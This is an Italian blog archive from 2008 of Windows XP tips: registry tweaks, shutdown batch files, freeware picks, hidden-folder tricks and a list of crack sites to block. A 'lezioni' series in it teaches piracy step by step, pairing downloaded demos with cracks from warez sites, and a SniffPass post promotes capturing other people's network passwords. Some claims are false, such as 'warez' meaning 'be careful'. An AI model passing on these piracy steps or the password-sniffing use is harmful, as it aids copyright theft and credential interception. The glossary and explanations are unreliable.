martedì 14 ottobre 2008

Gestione periferiche ecco come arrivarci facilmente

Scommetto che spesso dovete ricorrere alla finestra “Gestione periferiche” per installare driver problematici o per controllare cosa non va nel vostro hardware. Accedervi è un’operazione piuttosto macchinosa visto che di solito è necessario clicckare con il tasto destro su Risorse del computer, selezionare Proprietà, poi Hardware e poi, finalmente “Gestione Periferiche”. Per velocizzare i tempi è possibile creare un collegamento diretto a questa funzione. Come fare? Ciccate con il tasto destro sul desktop e selezionate la voce Nuovo > Collegamento. Nella finestra che vi si apre inserite come percorso “devmgmt.msc” come nello screenshot che segue:



Fate Avanti, mettete il nome che preferite e fate di nuovo avanti, ed ecco che sul Desktop appare il vostro nuovo collegamento veloce a Gestione periferiche. Potete in seguito trascinarlo nel meno d’avvio in modo da averlo disponibile anche lì.

Come creare una password complessa ed efficace

Una importante nozione per la protezione è quella della scelta di una password adeguata e difficilmente riconoscibile. Una password che si rispetti è formata almeno da sette caratteri che comprendano maiuscole, minuscole e numeri. E' bene inoltre che la sequenza dei caratteri riporti qualcosa alla mente per non scordarla! Tuttavia Windows XP fornisce uno strumento per generare una password complessa di otto caratteri. Per utilizzare questo strumento digitare net user nome utente/random in una finestra del prompt dei comandi. La password creata verrà applicata subito all'utente connesso in quel momento. Annotarsela bene e conservarla al sicuro.

Come configurare il blocco note

E' possibile configurare il blocco note nel registro alla chiave Hkey_Current_User\ Software\Microsoft\Notepad. Inserendo nella voce fWrap il valore Dword 1, si attiva la funzione a capo automatico del testo. Con StatusBar (Dword=1) si configura una barra sul bordo inferiore che indica in quale riga e colonna si trova il cursore. In ifFaceName (Reg_Sz) si definisce il font, per esempio Lucida Console, Tahoma oppure Courier.

Applicazioni per creare mp3 da tracce audio e vantaggi dei .wma

Windows Media Player di Windows XP non crea file Mp3 da tracce audio Cd, ma supporta codificatori Mp3 di altri produttori. Il formato Wma supportato dal Media Player ha il vantaggio rispetto agli mp3, di raggiungere una compressione in alcuni casi anche della metà e di mantenere una qualità molto buona. Se si desidera creare file Mp3 da tracce Cd, è possibile scaricare un MP3 Creation Pack for Windows XP. Per trovare queste applicazioni, selezionare la voce Opzioni dal menu Strumenti, cliccare su Informazioni MP3 dalla scheda Copia musica. Il collegamento aprirà la pagina Microsoft dedicata al download dei plug-in per la creazione di file informato Mp3.

Un Copia e Incolla per professionisti

La funzione di Appunti di Windows è una delle più utilizzate da tutti gli utenti e consiste nel classico copia e incolla utilizzando i tasti Ctrl + C (che copia nella cache i dati) e Ctrl + V che li incolla dove si desidera. Questa funzione di Windows tuttavia negli anni non è mai stata potenziata e sviluppata da Microsoft. Esistono tuttavia degli ottimi freeware che consentono di utilizzare gli Appunti in modo più professionale. Clipboard Helper (disponibile su www.soft.tahionic.com) per esempio, anziché far ripetere innumerevoli volte l'operazione copia e incolla, consente di raccogliere automaticamente i contenuti con Clipboard Helpere e salvarli temporaneamente in un file, nel quale è possibile aggiungere dei separatori per una maggiore chiarezza. Da segnalare che il tool funziona anche senza installazione sul disco rigido. C' è poi anche Clipboard Magic (www.cybermatrix.com) che può inserire una quantità illimitata di appunti, supporta il dragand drop, salva liste di appunti, cerca, ordina e sostituisce i contenuti, offre una funzione di modifica e può copiare dei frammenti di dati negli appunti di Windows. M8 FreeClipboard (www.m8software.com) dispone invece di alcune utili funzionalità aggiuntive come per esempio salvare le schermate oltre al testo, gli ultimi 30 appunti sono memorizzati automaticamente. All'indirizzowww.win8m.com, inoltre, è disponibile M8 Multiclipboard, una versione a pagamento più recente capace di memorizzare fino a 300.000 appunti in 100 librerie, Il Programma Copy & Trim è invece utile nel caso in cui si utilizzi il copia e incolla lavorando soprattutto nelle pagine web dove gli spazi vuoti tra le righe sono molto fastidiosi. Questo programma infatti rimette in ordine questo tipo di formattazione oltretutto diminuendo anche le dimensioni del file. Questo freeware è disponibile all'indirizzo www.freewarehits.de/ToolsPackage.htm .

Come distinguere applicazioni da 16 o 32 bit

Vista la compatibilità della maggior parte dei programmi Windows 3.x con Windows XP, spesso e volentieri non è facilmente distinguibile un'applicazione a 16 bit da una a 32 bit. Esistono comunque due possibilità per verificare queste car4atteristiche: 1) cliccare con il destro sul file eseguibile del programma e andare su Proprietà. Se c' è una scheda Versione vuol dire che si tratta di un'applicazione a 32 bit. 2) se il programma è in esecuzione si può premere Ctrl+Alt+Canc per apri-re Task Manager Windows. Nella scheda Processi cercare nella colonna Nome immagine il file eseguibile dell'applicazione. Se sono in esecuzione programmi a 16bit sarà presente una voce perNtvdm.exe, la macchina virtuale Dos, wowexec.exe e il nome eseguibile di ogni programma a 16 bit in esecuzione in quella macchina virtuale.

Eliminare i Beep del Bios

I suoni provenienti dall'interno del computer a volte possono disturbare. Ebbene è possibile disabilitare questa funzione di avviso. Per fare ciò, nel registro, alla chiave Hkey_Current_User\Control Panel\Sound impostare nosotto la voce Beep.

Restringere un Menù Programmi troppo lungo

E' possibile, inoltre, utilizzare un'altra funzione che consente di visualizzare in modo più ordinato l'elenco dei programmi nel menù. Accade infatti talvolta che lo schermo non basti più a contenere l'elenco dei programmi. Con questa opzione si aggiunge una freccia in cima o in fondo al menu troppo lungo e basta puntare sulla freccia per scorrere il menu in quella direzione. La stessa opzione è disponibile anche per gli utenti del menu di avvio predefinito. Cliccare con il pulsante destro del mouse su Start, selezionare Proprietà e cliccare su Personalizza. Aprire la scheda Nella finestra di dialogo Personalizzazione menu di avvio Avanzate e quindi selezionare Scorri il menu programmi nella casella Elementi del menu di avvio.

Ecco come avere fino a 20 desktop

Un alternativa ad un sistema multi-monitor è quella delle interfacce virtuali. Attraverso questo sistema, tramite la pressione di una combinazione di tasti, è possibile passare ad altri desktop personalizzati con sfondi, icone e finestre. Il software che permette di fare questo è il tool freeware Dexpot che mette a disposizione fino a 20desktop virtuali in Windows Xp ed è compatibile con le versioni precedenti fino a Windows 95. Si tratta di un desktop manager che integra funzioni aggiuntive come il modulo per la creazione di regole, l'anteprima, lo slideshow e l'avvio automatico delle interfacce. Dexpot è un programma gratuito per uso privato, mentre gli utenti commerciali lo possono acquistare a pochi euro (www.dexpot.de/en).

Promemoria per non dimenticare più nulla

Concentrati nel tuning di Windows, si rischia di scordare le altre attività. Per essere sicuri di ricordarsi tutto, si può fare in modo che Windows avvisi delle scadenze importanti. Attraverso un programma freeware, come Atnotes (http://atnotes.free.fr/download.html), si creano degli avvisi sotto forma di promemoria virtuali che si visualizzano sul Desktop e che possono anche essere abbinati ad allarmi sonori. La cosa comodo e funzionale è che questi "memo" possono essere minimizzati e nascosti fino all'ora impostata dell'allarme. Questi promemoria possono anche essere inviati all'interno della rete.

Come aggiungere o eliminare l'esecuzione automatica di programmi all'avvio di windows

Run e Run Once sono le sottochiavi di registro che servono per l'esecuzione automatica dei programmi all'avvio del computer e si trovano in due percorsi diversii: dove i comandi vengono eseguiti quando un utente accede al computer, nella chiave di registroHKLM\Software\Microsoft\Windows\CurrentVersion e dove i comandi sono avviati, invece, dopo che l'utente si è connesso al sistema in HKCU\Software\Microsoft\Windows\CurrentVersion. Windows XP tratta i comandi che si trovano in Run diversamente rispetto a quelli che risiedono in Run Once.In particolare, i comandi presenti nella sottochiave Run vengono eseguiti ogni volta che l'utente accede al computer mentre quelli in Run Once sono avviati una sola volta. Al termine dell'operazione la chiave è rimossa da Run Once. Per aggiungere un comando a Run o a Run Once in HKLM o HKCU, creare un valore stringa che abbia un nome arbitrario ma descrittivo. Inserire la riga di comando da eseguire nel nuovo valore. La chiave Run in HKCU, per esempio, ospita per impostazione predefinita il valore MSMSGS che contiene "C:\Programmi\Messenger\msmsgs.exe"/background che consente di avviare Windows Messenger ogni volta che l'utente accede a Windows XP. E' più facile che sia necessario rimuovere comandi alla sottochiave Run per disattivare l'esecuzione dei programmi all'avvio del computer o all'accesso a Windows XP, non togliendo che a volte può anche essere utile aggiungere comandi.

martedì 7 ottobre 2008

Se l’autorun di Windows XP vi infastidisce, potete toglierlo seguendo questi semplici passi:

Dal menu di avvio fate click su esegui
Scrivete gpedit.msc nella finestrella che si apre e premete ok
Fate click su Configurazione computer
Fate click su Modelli Amministrativi
Click su Sistema
Trovate l’opzione “Disattiva riproduzione automatica”
Cliccateci col destro, fate proprietà
Selezionate l’opzione attivata e fate Ok

Come vedere il proprio indirizzo ip

Ci sono due modi veloci e semplici per visualizzare il proprio indirizzo IP su Windows XP:


Click con il tasto destro sull’iconcina della connessione nella barra di sistema in basso a destra, seleziona la voce Stato e nella finestra che si apre andate alla tabella Dettagli. Quello contrassegnato come “Indirizzo IP client” è il vostro indirizzo IP.
Cliccate su start, poi su Esegui e nella casella che vi si apre scrivete cmd (vedi immagine seguente), poi premete ok.




Vi si aprirà una finestra di MS DOS. Digitandovi “ipconfig” e premendo invio vi verranno fornite molte informazioni riguardo la vostra connessione, compresa la voce Indirizzo IP.

lunedì 6 ottobre 2008

Come far apparire il proprio nome vicino all'orologio

Per impostare il nick vicino l'orologio bisogna effettuare questa semplice procedura.

Andare su pannello di controllo, visualizzare per categorie, cliccare
lingua e opzioni internazionali, cliccare il bottone personalizza, poi ora. Qui mettere fra apici il proprio nick prima dell'orario, esempio:

'beluas' 12.34.56

Come rinominare il cestino

sembra una stupidaggine (infatti lo è) xrò e una cosa divertente, potrete far inkazzare gli amici dicendo io lo so fare e tu no, dopo aver effettuato il tutto scritto qui sotto cliccate destro sul cestino e rinominatelo come fareste con una normale cartella, andate su start - esegui - regedit - e trovate
"HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder"
e cambiate
"Attributes"= 50,01,00,20
"CallForAttributes"= 00000000

dovreste avere una cosa così:

AVERE LE ICONE SENZA NOME

ECCO COME AVERE ICONE INNOMINATE!!!:
Volete disporre alcune icone sul vostro desktop senza che compaia il nome sotto?
E' possibile: fate in questo modo: evidenziate l'icona prescelta, cliccateci su e con il pulsante destro scegliete la voce Rinomina.
Attivate il tasto Bloc Num sopra il tastierino numerico (in genere e' sempre attivato).
Premete ALT e contemporaneamente digitate questo numero 0160 a vista non scrivete nnt non preoccupatevi dopo non uscirà il nome che prima aveva la cartella ma niente utilizzando la tastiera numerica. Infine premete Invio.
Adesso l'icona e' senza nome. Se volete anche le altre icone senza nome sul desktop, dopo aver digitato il codice numerico premete spazio per una volta per la seconda icona, due volte per la terza e cosi' via.


RIAVVIARE E SPEGNERE XP CON UN CLIK:

Questi due batch servono a spegnere e riavviare Xp con un clic, vedi tu, ciao :)
Spegnimento/Riavvio in Xp
prendete il blocco note e incollateci dentro questo:

@echo off
shutdown -s
cls

Questo serve a spegnerlo, salvate con nome (utilizzate le virgolette come da esempio) "uscita.bat" altrimenti il file verrà salvato come .txt, non utilizzate i nomi come exit perchè questo corrisponde a un comando e il sistema esegue prima i comandi suoi, quindi i nomi che volete assegnare ai batch devono essere diversi.
Per riavviare il pc:

@echo off
shutdown -r
cls

e assegnate un nome tipo riavvio.bat
Per vedere le altre opzioni del comando digitate dal prompt di dos shutdown /?
Trucco testato su Windows Xp Pro

sabato 4 ottobre 2008

Aggiornare i server del mulo

EKKO 2 LINK PER AGGIORNARE LA LISTA SERVER DI EMULE


* http://www.server-met.de/dl.php?load=gz ... 57819.4167

* http://peerates.net/servers.php

I siti + pericolosi della rete,come difendersi


Vi è stato un gran parlare nei blog italiani quando è uscita la notizia per cui McAfee aveva stilato il report dei siti più pericolosi su internet, siti attraverso i quali si promuove di fatto la diffusione dei virus per computer e pc Windows di tutto il mondo.
Come spesso avviene la notizia è stata presa cosi com'è uscita e con le stesse parole dando le solite inutili classifiche dei paesi più produttivi dei virus e nessuno si è preoccupato di dare almeno qualcuno dei nomi di questi siti più pericolosi.
McAfee infatti parla di come i virus siano diffusi nei domini dei paesi del mondo stilando una classifica per cui i siti internet Hong Kong, Cina, Filippine, Romania e Russia sono alle prime 5 posizioni per pericolosità nel web mondiale.

Bene, questo è la tipica notizia facile di cui i giornalisti e i blogger vanno ghiotti ma che non sono di nessun aiuto e di nessuna utilità agli utenti normali e navigatori su internet.
Approfondendo un po' la cosa, cercando e testando diversi domini, abbiamo dunque stilato una lista di siti internet molto pericolosi ricchi di virus e malware pronti ad entrare sui pc dei navigatori ignari o imprudenti.

Capitare sulla maggior pare di questi siti è facilissimo, infatti sono facilmente trovabili da Google, sono scritti in inglese e trattano di argomenti come i crack ( ossia di come piratare i programmi a pagamento ), siti porno, siti che offrono programmi gratis, suonerie e giochi per i cellulari e tanti altri prodotti commerciali.
Su questo blog è stato gia fatto un articolo per uno dei siti internet più pericolosi sul web e sempre ai primi posti nelle ricerche con Google, Italian Eazel e compagnia; di seguito segnalo altri siti internet assolutamente da evitare e non visitare e soprattutto da inserire nella black list del browser internet.

Ad esempio per chi usa Internet Explorer deve andare sulla barra dei Menu-->Strumenti-->Opzioni Internet-->Protezione-->Siti con restrizione-->Siti ed aggiungerli, senza dubbio, uno per uno.
La lista dei peggiori siti su internet ovviamente non solo non è completa ma non lo sarà mai in quanto di siti cosi ne fioccano in continuazione, l'importante è rimanere aggiornati con gli antivirus e gli antispyware.

http://www.cracks.am (il più famoso pubblicizzato anche da tuttogratis.it), http://www.serialsite.com, http://www.serialcrackz.com, http://www.zor.org, http://www.anycracks.com, http://www.crackspider.net, http://www.serialz.to,www.serials.ws, http://www.seriall.com -(segnalato come uno dei siti più pericolosi in assoluto), http://www.theserials.com, http://www.crack.cd, http://www.asta-killer.com, http://www.d-cracks-serials.com, http://www.download-crack-serial.com, http://www.Atom-Soft.com, http://www.hackzone.us, www,keygencrack.com, http://www.cracks, thebugs.ws, http://www.download5000.com, http://www.freeserials.com, http://www.crackfound.com, http://www.crackz.ws, http://www.crack team.ws, http://www.mscracks.com, http://www.siamcrack.com, http://www.serials.ws, http://www.keygen.us, http://www.crack-cd.com, http://www.grep.ws, http://www.powerddl.com, http://www.crackspider.us, http://www.satanwarez.com, http://www.oday-warez.com, http://www.netvouz.com, http://www.crackserver.com, http://www.hackpr.net, http://www.bestcracks.net, http://www.keygen.ru, http://www.sh3bwah.com, http://www.crackserial.net, http://www.serialdevil.com, http://www.clean-cracks.com, http://www.superserials.com, http://www.customize.ru, http://www.crackportal.com, http://www.phazeddl.com

Questi siti sono chiamati "Trojan Downloader Website" , come vi si entra caricano sul computer qualcosa di loro e i loro effetti variano da semplici disturbi alla navigazione su internet fino a costringere il malcapitato a dover formattare il pc.
Se conoscete altri siti pericolosi, sarebbe un piacere tenere questa lista aggiornata.

Per finire la segnalazione delle classifiche dei Virus più diffusi nel mondo di Giugno direttamente dal sito Kaspersky Lab che evidenziano, tra le prime posizioni i virus che si diffondono come allegati delle mail e sulle reti P2P come ad esempio NetSky, Nyxem e MyDoom

Tra i virus più curiosi e pericolosi, per fortuna non troppo diffusi, invece abbiamo (estratto da un articolo di Zeus News):

MalwareProtector2008 e AdvancedXpFixer riempiono i computer di bug. Per essere precisi, scarafaggi virtuali "mangiano" il desktop. In realtà, l'obiettivo è convincere gli utenti che il Pc è infetto (non sempre è vero) e spingerli ad acquistare la soluzione di sicurezza offerta da questo adware.
Tixcet.A è un worm che cancella gli hard disk.
PGPCoder.E è un nuovo esemplare di codice rapitore che tiene in ostaggio i dati di un computer e chiede un riscatto. Nello specifico, utilizza un algoritmo per crittare tutte le informazioni ed esige denaro per fornire le chiavi per decrittarle. È un esempio significativo di come i crimini della vita reale si riflettano su quella del Web.
Nuwar.OL, Nuwar.Ql (conosciuti anche come Storm Worm) e Valentin.E sono codici utilizzano temi romantici per ingannare gli utenti e infettare i loro computer.
Romeo.C, difficile da riconoscere, mostrando news di attualità, realizza azioni pericolose. Forse anche alcune delle vittime sono state impressionate da questo nuovo programma che tiene diligentemente aggiornati sulle ultime notizie.
Manclick.A, Manclick.B e Manclick.C si fingono programmi diversi, ingannando gli utenti, convinti di installare un'applicazione legittima, invece di un malware. Inoltre, reindirizzano i navigatori su false pagine Web, legate a servizi bancari, per raccogliere informazioni da usare per frodi online.
FakeDeath.A è un worm che annuncia la morte di Fidel Castro per ingannare gli utenti e colpire il loro PC. E' bene ricordare che non si può sempre credere a tutto ciò che si legge!
Il worm RenameLoi.A, quando viene eseguito, produce un fastidioso rumore e mostra un messaggio relativo all'Anticristo e al giorno del Giudizio Universale.
Quando gli utenti eseguono il file che contiene questo codice maligno, il worm MSNWorm.El mostra una foto di un maialino truccato, con occhiali da sole e gioielli al collo.
BeepBeep.A ama attirare l'attenzione su di sé e ogni volta che gli utenti accedono a una cartella di Windows o del sistema, emette una serie di segnali acustici noiosi (beep).

LEZIONE NUMERO 7: la filosofia del pirata

Il pirata non distrugge ne danneggia. Il pirata controlla, vigila, entra, supera i sistemi di sicurazza e non lascia mai traccia del suo passaggio, quindi state bene attenti andando contro questa filosofia potreste trovarvi contro i vostri cosidetti colleghi oltre che alle forze dell'ordine perciò fate sempre il tutto con estrema cautela attenti a non smuovere nnt

LEZIONE NUMERO 6: facciamo una prova

Proviamo a scaricare un programma che ci interessa: Abbiamo bisogno, per esempio, di Cute FTP, quindi andiamo su Download.com (il link posto sopra)e cerchiamo CuteFTP. Una volta trovato il file, iniziamo il download e, mentre scarica, apriamo un'altra finestra e andiamo nel sito di alstlavista (http://www.astalavista.com). e cerchiamo il crack per CuteFTP. Una volta trovato, installate il programma e copiate il crack nella directory d'installazione ed il gioco è fatto e, questo gioco, potrà essere ripetuto per qualsiasi altro programma

LEZIONE NUMERO 5: i siti interessanti

Ecco un elenco di siti Hacker. Da qui, potrete raggiungere altre fonti di informazioni

Astalavista[link:http://astalavista.box.sk/] Sito di ricerca per crack, c'è praticamente tutto (anche il bleem 1.5b)

Download[link:http://www.download.com/] Qui trovate i demo-shareware da crakkare

Shareware[link:http://www.shareware.com/] Anche qui troverete i demo-shareware da crakkare

Alexmessomalex[link:http://www.alexmessomalex.com/] un pò vecchiotto(2005] ma uno dei migliori siti di Hacking in Italiano presenti sulla rete

LEZIONE NUMERO IV:

i programmi da usareI
Ecco un elenco minimo di software che ogni Hacker che si rispetti deve avere:

Download Accellerator[link:http://www.lidan.com/] svolge le seguenti funzioni: Prova a scaricare il file più volte, nel caso in cui il server sia occupato, recupera il download interrotti, partendo da dove si era rimasti, analizza il file esplicitando grandezza, velocità di trasferimento e tempo stimato

Cute FTP[link:http://www.cuteftp.com/] Connessione ai server FTP, per downloadare o uploadare files

WinZip 7.0[link:http://www.winzip.com/] Serve per comprimere/decomprimere i file scaricati da Internet

LEZIONE NUMERO III: non perdere la pazienza

Ci vuole un pochino per trovare il link giusto, ma una volta trovato avrai il tuo gioco o il tuo programma completamente gratis. Per i programmi che occupano oltre 20MB, vi è la possibbilità di scaricarli a poco a poco, e cioè in tanti comodi file ZIP, non più grandi di 4 o 5 MB l'uno

LEZIONE NUMERO II: sapersi orientare

Ogni sito pirata che si rispetti, per potersi mantenere, ha bisogno di soldi, e nessuno meglio dei pirati sa come farti cliccare sullo sponsor. Una volta arrivati in una pagina Warez, attenzione ai links!!!!! Non farsi fregare dai vari CLICK HERE a caratteri grandi quanto na casa, probabilmente, si tratta di pubblicità. Cerca di intuire bene dove clikkare, e tieniti pronto a chiudere le varie finestre che si apriranno automaticamente dopo ogni click, sono sempre e solo sponsor. I siti Hacker hanno un difetto (che può essere inteso anche come un pregio): è difficile che un link funzionante oggi, funzionerà anche domani

LEZIONE NUMERO I: le Key Words

Prendiamo confidenza con alcune parole chiavi (dette Key Words), un mini dizionarietto con i termini più comuni che si possono trovare nei siti Hacker

Z: Z = pirata, la lettera Z è usata dagli Hackers al posto delle S finali (es: CRACKS diventa CRACKZ)

WAREZ: indica un sito pirata. Tradotto letteralmente, significa stai attento

CRACKZ: Il Crack è un programmino che rende eseguibile un programma DEMO oSHAREWARE, come se fosse stato acquistato, oppure ti permette di far funzionare un dato software, senza l'ausilio del CD-ROM

SERIALZ: Numero di serie. Serve per registrare i programmi Shareware e quindi, inserendo il serial number nell'apposito spazio, si ottiene la versione completa del gioco

APPZ: Applicazioni e programmi. Nei siti Hacker si possono trovare anche interi giochi d scaricare gratuitamente, che in commercio sono vendibili a 100.000£ l'uno, ad esempio

GAMEZ: Giochi vecchi e nuovi, crakkati e perfettamente giocabili

MP3Z: Raccolta di canzoni in formato Mp3 (vi si trovano anche canzoni illegali e non autorizzate)

HACKZ: Programmi creati da Hcker per disconnettere la gente, generare codici per carte di credito...roba illegale al 100%

VIRII: Veri e propri virus, di tutti i tipi e per tutti i gusti

DOWNLOAD: Trasferire file da un sito al proprio computer

UPLOAD: trasferire file dal proprio computer ad un sito

Scricare file molto facilmente

QUANTE VOLTE VI èCAPITATO DI ARRIVARE ALL'80-90% E O SI BLOCCA IL DOWNLOAD O SI STACCA INTERNET E ALTRE COINCIDENZE. FINALMENTE ABBIAMO TROVATO IL MODO PER CONTRASTARE IL DESTINO CON QUESTO PROGRAMMA CHE PROVA A SCARICARE IL FILE PIù VOLTE RECUPERA I DOWNLOAD INTERROTI PARTENDO NON DA 0 MA DA DOVE SI ERA RIMASTI, ANALIZZA I FILE IN MODO DA POTER DIRE QUANTO E GRANDE E A QUANTO VA LA VELOCITà DI DOWNLOAD E IL TEMPO STIMATO ALLA FINE DEL DOWNLOAD

TUTTO QUESTO CON DOWNLOAD PLUS ACCELERATOR SCARICABILE DAL LINK QUI SOTTO

http://www.download.com/3001-2071_4-10885215.html?spi=77363016fdf5040b369249b1971d65c3&part=dl-10037157&idl=n

::**Trucchetti Pc**:: 2° Parte

Disattiviamo i sevizi inutili: durante ogni avvio del sistema windows xp esegue una serie di servizi per disattivare cio che non serve clicchiamo start poi esegui e inseriamo la parola services.msc se troviamo dei servizi inutilizzati es gestione del ipod o controllo della smart card possiamo disattivarli per ridurre cosi il tempo d'avvio del computer





Togliamo i pericoli dal pc: per rimuovere velocemente malware e programmi spia possiamo affidarci a malware removal tool per attivarlo basta cliccare su start scegliere esegui e digitare mrt.exe dopo scegliamo la scansione completa invece di quella rapida il computer verra tratenuto qualche minuto in piu ma avremo un controllo piu approfondito attenzione questo strumento non prende il posto di un spyware completo perche non riconosce tutte le minaccie





Eseguire la deframmentazione dei dischi: windows è un sistema disordinato, tutti i file che salviamo o cancelliamo si sparpagliano senza un ordine preciso per prevenire tutto cio clicchiamo con il tasto dx sul disco fisso che vogliamo deframmentare andiamo su proprietà scegliamo strumenti e poi esegui defrag cosi la velocita di aperture cartelle e programmi sara piu veloce poi e consigliabile fare la deframmentazione una volta al mese


::**Trucchetti pc**:: 1° PARTE

velocizzare l'avvio di windows xp: facciamo clic su start quindi sul comando esegui una volta aperta la finestra scriviamo regedit poi cerchiamo la stringa hkey_current_user\control panel\desktop\menushowdelay.dovremmo trovare il valore 400 facciamo clic due volte su menushowdelay e scegliamo un valore inferiore a 400 ma superiore a 0 io consiglio 200.si tratta di un piccolo beneficio ma rendera il pc piu efficace e meno frustante





chiusura rapida di windows xp: windows puo impiegare piu di qualche minuto per chiudersi a causa sempre crescente di programmi che installiamo però esiste un truccho per velocizzare la chiusura, facciamo clic su start poi su esegui digitiamo regedit.exe apriamo la cartella hkey_local_machine\system\controlset001\control cerchiamo la voce waittokillservicetimeout il valore che troveremo sara di 20.000 clicchiamo due volte su waittokillservicetimeout e impostiamo il valore a 1000 da questo momento tutti i servizi attivi di windoms si chiuderano in un secondo





windoWs ad alta velocita: se stiamo usando windoms xp con un pc vecchiotto si puo aumentarne la velocita entriamo in pannello di controllo e facciamo clic su prestazione e manutenzione e poi su sistema scegliamo la scheda avanzate e clicchiamo su impostazione che troviamo nel riquadro prestazioni adesso scegliamo la voce regola in modo da ottenere le prestazioni migliori in questo modo perderemo maggior parte degli effetti grafici ma riduremmo drasticamente le attese


venerdì 3 ottobre 2008

::**Cartelle invisibili**::

In questo articolo vedremo una tecnica parecchio utilizzata nei circuiti underground per nascondere da... occhi indiscreti alcune cartelle "private";
tramite queste istruzioni otterremo quello che ottengono diversi programmi specifici, solo che noi lo faremo ricorrendo unicamente al SO, senza trucchi ne inganni (più o meno...)

Cominciamo con il cliccare con il tasto destro del mouse sulla cartella dove vogliamo creare la nostra cartella invisibile; tale luogo può essere benissimo il desktop, ma noi consigliamo, per motivi che spiegheremo tra poco, di utilizzare una cartella di parcheggio (ovvero creare una cartella sul desktop, e poi all'interno di essa, la nostra cartella nascosta).
Nel momento di digitare il nome da dare alla nostra cartella, attiviamo il tasterino numerico e tenendo premuto il tasto ALT, digitiamo sul tastierino il numero 0160; digitando questo codice scriviamo un carattere che sembra uno spazio, ma in realtà non lo è...
A questo punto ci troveremo con una cartella con il nome invisibile, mentre è ancora è presente l'icona; procediamo allora a fare sparire anche... l'icona!
Clicchiamo con il tasto destro sull'icona e selezioniamo la voce proprietà e da lì, scegliamo la voce "cambia icona"

Si aprirà di default una finestra con una serie di icone contenute nella dll SHELL32.DLL; selezionarne una tra quelle "nulle" (vedi figura) ed il gioco è fatto!




Considerazioni finali
Sebbene il trucchetto funzioni egregiamente, consigliamo di non applicarlo a livello del desktop, per evitare che durante il caricamento delle icone, per un momento, avvenga un refresh di 1-2 secondi che faccia "intuire" la presenza della cartella; meglio quindi creare una cartella di "transito" e all'interno di essa applicare il nostro trucchetto

::**Defraggler**::

su questo sito non parlerò solo di trucchi hacker ma anche di qualche trucco per ampliare le potenzialità del vostro pc eccone uno. d'ora in poi vicino ai trucchi normali ci sarà questo segno ::**trucco pc**::

La frammentazione dei files, è spesso causa di rallentamenti, blocchi e crash di sistema, problemi che possono portare anche ad un esborso di euro da parte nostra per rimediare a questi sintomi; possiamo prevenire queste spiacevoli situazione tenendo costantemente deframmentato il nostro disco rigido, Defraggler può aiutarci nel farlo e senza spendere un euro dato che si tratta di un programma totalmente gratis.



potete scaricarlo su questo link : http://www.filehippo.com/download_defraggler/

Sniffpass

SniffPass è un programma gratis che “sniffa” la rete; cattura le password che attraversano la scheda di rete, e le mostra a video. SniffPass è in grado di catturare le password dei protocolli POP3, IMAP4, SMTP, FTP e HTTP.
È possibile utilizzare SniffPass per recuperare password Web/FTP/e-mail.


Il software è in inglese ma è possibile renderlo in italiano, basta scaricare la traduzione su questo link : http://www.nirsoft.net/utils/trans/sniffpass_italian.zip , poi scompattare e copiare nella cartella Sniffpass.



p.s= sniffpass e scaricabile a questo link: http://sniffpass.en.softonic.com/download#pa

lunedì 29 settembre 2008

Nick divertenti

Per poter creare un nickname con questo metodo avete bisogno di Microsoft Word, della suite Microsoft Office... Non ne sono sicuro, ma credo si possa fare anche con i programmi di Open Office... Ad ogni modo:

-Aprite Microsoft Office Word

-Cliccate su "Inserisci" sulla barra in alto

-Cliccate su "Simbolo..."

A questo punto comparirà una finestra ricca di simboli che potete utilizzare per scrivere quello che volete: un nickname, il titolo di un modulo, il titolo dello Space, un intervento... Tutto insomma!



Una volta scritto il testo che vi serve, selezionatelo, copiatelo ed incollatelo dove vi serve!


--------------------------------------------------------------------------------

Esiste anche un modo più facile per personalizzare in questo modo il testo... Alcuni siti infatti permettono di creare dei nickname particolari...

Il primo che vi consiglio è Piazza Margherita. EKKO IL LINK = http://www.piazzamargherita.it/modules.php?name=Ascii_Nickname_Maker



Cliccando sui caratteri, questi verranno aggiunti alla barra in alto... Una volta creato il vostro nickname dovete copiarlo ed incollarlo dove volete.


--------------------------------------------------------------------------------

Il secondo sito che vi suggerisco è MSN Pseudos... EKKO IL LINK = http://msntrucastuce.free.fr/pseudos.php

In questo sito, oltre a trovare i codici presenti anche nell'altro sito, mette a disposizione anche i colori, che si possono visualizzare solamente se avete installato Windows Live Messenger PLUS... (cliccate sul link per aprire la pagina per il download e scaricartelo gratis in italiano)...

Il sito MSN Pseudos si divide in sezioni... Le più interessanti sono di sicuro queste




Questi sono dei modelli predefiniti che potete utilizzare per modificare il vostro nickname... Tutto quello che dovete fare è modificare la scritta "Ton Pseudo" con quello che volete nella barra bianca al di sotto del colore che vi interessa.

Un'altra delle possibilità offerte dal sito è questa



Potete scrivere qualsiasi testo nella barra in alto e, cliccando su "Transformer" il vostro testo verrà trasformato in un testo pieno di simboli!

Infine ecco l'ultimo strumento che potete utilizzare




Scrivendo il vostro testo nella prima riga, esso verra trasformato automaticamente in tre modi differenti: stile minuscolo con caratteri particolari; lettere e numeri che assomigliano a lettere; alternanza maiuscole e minuscole.

Alfabeto gigante su msn

Ragazzi so che criticherete questo post per l'inutilità ma è una cosa da sapere in più meglio di niente ecco a voi l'alfabeto (non tutto) di lettere giganti:

A= |̶̿ ̶̿ ̶̿ ̶̿|

b= |̶͇̿ ̶͇̿ ̶͇̿)

C= |͇̿ ͇̿ ͇̿ ͇̿

D= |͇̿ ͇̿ ͇̿ ͇̿)

E= |̶͇̿ ̶͇̿ ͇̿

F= |̶̿ ̶̿ ̶̿ ̶̿

g= |͇̿ ͇̿ ͇̿ ̶͇̿ι

H= |̶ ̶ ̶ ̶|

i= [b]|[/b]

L= |͇ ͇ ͇ ͇

M= |̿ V ̿|

N= |̿ \͇|

o= |͇̿ ͇̿ ͇̿|

T= ̿ ̿|̿ ̿

U= |͇ ͇ ͇ ͇ ͇|

v= [b]\ ͇ /[/b]

W= [b]|͇ Λ ͇|[/b] oppure [b]\͇ Λ ͇/[/b]

COPIATE E INCOLLATE LIBERAMENTE!!!

Alcuni consigli:

se inserite il nick gigante come nick, potrebbe creare problemi al vostro windows live messenger inseritelo solo nel vostro messaggio personale.
Quando state creando il vostro nick gigante e state inserendo le lettere, tra una lettera e l'altra dovete lasciare 2 spazi e per fare il nick ancora piu visibile vi consiglio di metterlo in grassetto

domenica 28 settembre 2008

Nascondere le conversazioni MSN a terzi

